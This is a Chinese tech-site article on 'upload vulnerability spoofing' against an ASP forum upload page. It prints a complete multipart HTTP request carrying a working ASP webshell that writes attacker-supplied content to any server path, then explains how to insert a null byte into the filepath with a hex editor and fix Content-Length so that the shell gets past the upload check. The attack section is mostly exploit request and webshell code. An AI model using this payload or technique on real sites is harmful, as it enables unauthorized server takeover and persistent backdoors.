解析上传漏洞欺骗技术
创始人
2024-07-14 05:41:36
0

实际上网络中存在着很多的漏洞,通过这些漏洞的利用黑客就可能会入侵网站的服务器,取得管理员权限。其中不少的程序都存在着上传漏洞,通过上传漏洞黑客入侵者便可以上传一个ASP木马,然后通过上传漏洞欺骗技术来达到自己入侵的目的。接下来本篇文章就讲分析一下上传漏洞欺骗的具体原理。

POST /bbs/upfile.asp HTTP/1.1

……. 省略了N多没用信息

 

  1. Content-Length: 1792  
  2. Connection: Keep-Alive  
  3. Cache-Control: no-cache  
  4. Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN 
  5. -----------------------------7d52191850242  
  6. Content-Disposition: form-data; name="filepath" 
  7.  
  8. uploadFace  
  9. -----------------------------7d52191850242  
  10. Content-Disposition: form-data; name="act" 
  11.  
  12. upload  
  13. -----------------------------7d52191850242  
  14. Content-Disposition: form-data; name="file1"; 
  15. filename="E:\木马\asp\shell.asp" 
  16. Content-Type: text/plain  
  17.  
  18. <% dim objFSO %>  
  19. <% dim fdata %>  
  20. <% dim objCountFile %>  
  21. <% on error resume next %>  
  22. <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>  
  23. <% if Trim(request("syfdpath"))<>"" then %>  
  24. <% fdata = request("cyfddata") %>  
  25. <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>  
  26. <% objCountFile.Write fdata %>  
  27. <% if err =0 then %>  
  28. <% response.write "<font color=red><h2>成功!</h2><font>" %>  
  29. <% else %>  
  30. <% response.write "<font color=red><h1>失败!</h1></font>" %>  
  31. <% end if %>  
  32. <% err.clear %>  
  33. <% end if %>  
  34. <% objCountFile.Close %>  
  35. <% Set objCountFile=Nothing %>  
  36. <% Set objFSO = Nothing %>  
  37. <% Response.write "<form action='' method=post>" %>  
  38. <% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>  
  39. <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>  
  40. <% Response.Write "<br>" %>  
  41. <% Response.write "地址来自" %>  
  42. <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>  
  43. <% Response.write "<br>" %>  
  44. <% Response.write "你的留言:" %>  
  45. <% Response.write "<textarea name=cyfddata
  46. cols=80 rows=10 width=32></textarea>" %>  
  47. <% Response.write "<input type=submit value=sky!!>" %>  
  48. <% Response.write "</form>" %> 

-----------------------------7d52191850242

Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp

-----------------------------7d52191850242

Content-Disposition: form-data; name="Submit"

上传
-----------------------------7d52191850242--

传递的信息我们获取了,下面就来修改下达到上传漏洞欺骗目的。主要修改一下几点:

1.Content-Disposition: form-data; name="file1"; filename="E:\木马\asp\shell.asp"

2.Content-Disposition: form-data; name="fname"

E:\木马\asp\shell.asp

3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我们修改成uploadFace\shell.asp后面怎么加一个空字符呢?用UltraEdit是个好方法,用16进制编辑,(因为'\0'这个字符也占一个位置,所以我们先打入一空格,然后再在UltraEdit(用Ctrl+H转换到16进制模式下)里将就空格符的20改成00)。

4.还有一个地方也要修改,就是这句Content-Length: 1792表示提交数据的字符个数。

如果你修改了filepath的值那么这个长度1792也要变换,一个字母或者数字的长度就是1,不要忘记最后面那个空格那个也算1。

【编辑推荐】

  1. 亲身体验MS07-029漏洞入侵
  2. 解析系统泄露密码入侵攻击
  3. 经典后门实例之线程插入后门
  4. 经典后门实例之扩展后门
  5. 通过数据库下载漏洞发起网络攻击

 

相关内容

热门资讯

如何允许远程连接到MySQL数... [[277004]]【51CTO.com快译】默认情况下,MySQL服务器仅侦听来自localhos...
如何利用交换机和端口设置来管理... 在网络管理中,总是有些人让管理员头疼。下面我们就将介绍一下一个网管员利用交换机以及端口设置等来进行D...
施耐德电气数据中心整体解决方案... 近日,全球能效管理专家施耐德电气正式启动大型体验活动“能效中国行——2012卡车巡展”,作为该活动的...
Windows恶意软件20年“... 在Windows的早期年代,病毒游走于系统之间,偶尔删除文件(但被删除的文件几乎都是可恢复的),并弹...
20个非常棒的扁平设计免费资源 Apple设备的平面图标PSD免费平板UI 平板UI套件24平图标Freen平板UI套件PSD径向平...
德国电信门户网站可实时显示全球... 德国电信周三推出一个门户网站,直观地实时提供其安装在全球各地的传感器网络检测到的网络攻击状况。该网站...
着眼MAC地址,解救无法享受D... 在安装了DHCP服务器的局域网环境中,每一台工作站在上网之前,都要先从DHCP服务器那里享受到地址动...
为啥国人偏爱 Mybatis,... 关于 SQL 和 ORM 的争论,永远都不会终止,我也一直在思考这个问题。昨天又跟群里的小伙伴进行...